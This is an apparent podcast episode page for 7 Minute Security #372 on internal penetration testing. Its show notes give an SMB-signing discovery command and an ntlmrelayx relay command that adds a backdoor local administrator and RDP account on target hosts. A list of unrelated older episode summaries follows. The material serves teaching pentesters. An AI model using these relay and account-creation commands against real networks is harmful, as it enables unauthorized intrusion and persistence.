7MS #372: Tales of Internal Pentest Pwnage - Part 5
7 Minute Security15 Juli 2019

7MS #372: Tales of Internal Pentest Pwnage - Part 5

Today's episode is brought to you by ITProTV. It's never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://pro.tv/7minute

Today I share the (hopefully) exciting and fun conclusion to last week's episode about a tale of internal pentest pwnage! A few important notes from today's episode:

  • Need to find which hosts on your network have SMB signing disabled, and then get a nice clean list of IPs as a result? Try this:
opt/responder/tools/RunFinger.py -i THE.SUBNET.YOU-ARE.ATTACKING/24 -g > hosts.txt grep "Signing:'False'" hosts.txt | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > targets.txt

Source: Pwning internal networks automagically

  • Ready to pass captured hashes from one host to another? Open responder.conf and turn SMB and HTTP to Off, then get Responder running in one window, and ntlmrelayx in another. Specifically, I like to use ntlmrelayx.py -tf targets.txt where targets.txt is the list of machines you found that are not using SMB signing. I also like to add a -c to run a string of my choice. Check out this fun evil little nugget:
net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add

So the full command would be:

ntlmrelayx.py -tf targets.txt -c 'net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add'

Check today's show notes at https://7ms.us for more information!

Avsnitt(705)

7MS #128: Transparency is King

7MS #128: Transparency is King

In this episode, I talk about a restaurant infosec assessment I did, and how the recommendations coming out of that assessment didn't fit the standard "mold." I also talk about how being transparent and helpful - and NOT billing clients for every tiny little thing - is king.

27 Dec 20159min

7MS #127: Intro to HIPAA Assessments

7MS #127: Intro to HIPAA Assessments

This episode covers a few HIPAA tidbits I picked up while preparing for - and executing - a HIPAA security assessment.

27 Dec 20159min

7MS #126: Get Your Name Out There

7MS #126: Get Your Name Out There

This episode isn't about infosec exactly, but it talks about how using public resources like LinkedIn, Twitter and blogs to boost your "brand" (though I hate that word) and help you get more connected to the infosec community, job leads and more!

24 Dec 20158min

7MS #125: Securing Your Life-Part 2

7MS #125: Securing Your Life-Part 2

Way back in episode #93, I talked about things you can do to secure your life (mortgage review, adequate insurance, estate planning, investments, etc.). This episode continues that train of thought and covers: getting the right amount of life insurance, getting the right home/auto coverage, as well as estate planning.

23 Dec 20157min

7MS #124: Sprinkles

7MS #124: Sprinkles

This episode is 90% a rant about how annoying carry-on luggage and air travel can be, and a 10% sprinkling of security sauce mixed in. Hence: sprinkles.

23 Dec 20158min

7MS #123: Doing a Redo Assessment

7MS #123: Doing a Redo Assessment

This episode talks about my experience in doing a "redo" security assessment, during which I struggled with the following questions: what's the best way to efficiently correct the erroneous information and make the customer happy without asking ALL the original questions over again? Especially when I have little to no time to prepare for the "redo" interview?

22 Dec 20159min

7MS #122: OFFTOPIC-An Apology to Elephants

7MS #122: OFFTOPIC-An Apology to Elephants

Preview76 wordsThis episode is about a documentary called An Apology to Elephants. It's all about the treatment (or mistreatment) of elephants, and the main message of the movie is, "Please don't go to the circus when it's in town, because you're supporting elephant abuse." Even if that message was a little heavy handed, I certainly will pass on tickets next time a circus act comes through town. You can subscribe to the 7 Minute Security podcast here.

20 Dec 20158min

7MS #121: Migrating from Tumblr to Ghost-Part 2

7MS #121: Migrating from Tumblr to Ghost-Part 2

Part 2 concludes my journey in moving 7ms.us from Tumblr to a Digital Ocean droplet running Ghost. Here are the key resources mentioned during the podcast: How to run multiple Ghost blogs on one DI VPS. The key takeaway here was that I had to upgrade to the $10 droplet (I did a "flexible" resize to add more proc/memory) and then the second instance of Ghost installed fine. Turning on CloudFlare SSL was easy. I chose flexible SSL since I wasn't using a "real" cert. I also wrote a rule to force HTTPs for all connections. And, just for grins, I turned on DNSSEC. Because...why not? :-) I picked a strong root password for my DI droplet, but I still don't like the idea of IPs banging on that connection all day and night. I followed this article on installing Fail2Ban to prevent my SSH login from being abused. There are a few IPs that I want to perma-ban, so I'm going to look throughthis article and this one which looks a tad easier. You can subscribe to the 7 Minute Security podcast here.

19 Dec 20158min

Populärt inom Politik & nyheter

aftonbladet-krim
svenska-fall
motiv
p3-krim
flashback-forever
fordomspodden
rss-viva-fotboll
rss-krimstad
aftonbladet-daily
rss-sanning-konsekvens
rss-vad-fan-hande
spar
rss-krimreportrarna
rss-frandfors-horna
blenda-2
olyckan-inifran
dagens-eko
krimmagasinet
rss-flodet
rss-expressen-dok